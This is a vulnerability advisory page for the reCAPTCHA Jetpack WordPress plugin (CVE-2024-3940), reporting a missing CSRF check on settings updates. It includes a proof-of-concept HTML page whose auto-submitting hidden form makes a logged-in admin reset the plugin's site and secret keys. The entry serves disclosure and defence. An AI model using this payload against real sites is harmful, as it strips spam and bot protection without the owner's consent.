Lucene search
Bob MatyasWPEX-ID:BB0245E5-8E94-4F11-9003-D6208945056CHistoryApr 19, 2024 - 12:00 a.m.
reCAPTCHA Jetpack <= 0.2.2 - Settings Update via CSRF
2024-04-1900:00:00
Bob Matyas
24
csrf exploit
may 03 2024
security vulnerability
Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Have an admin open an HTML page containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=recaptcha-jetpack" method="post">
<input type="hidden" name="site_key" value="" />
<input type="hidden" name="secret_key" value="" />
<input type="hidden" name="recaptcha_type" value="v2" />
<input type="hidden" name="reset" value="Reset to Defaults" />
<input type="submit" name="enter" id="enter" value="Submit">
</form>
</body>
```Related
cve
cve
CVE-2024-3940
2024-05-14 15:42:36
nvd
nvd
CVE-2024-3940
2024-05-14 15:42:36
wpvulndb
wpvulndb
reCAPTCHA Jetpack <= 0.2.2 - Settings Update via CSRF
2024-04-19 00:00:00
cvelist
cvelist
CVE-2024-3940 reCAPTCHA Jetpack <= 0.2.2 - Settings Update via CSRF
2024-05-10 06:00:02
vulnrichment
vulnrichment
CVE-2024-3940 reCAPTCHA Jetpack <= 0.2.2 - Settings Update via CSRF
2024-05-10 06:00:02
wordfence
wordfence
6.7 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.0%
Related for WPEX-ID:BB0245E5-8E94-4F11-9003-D6208945056C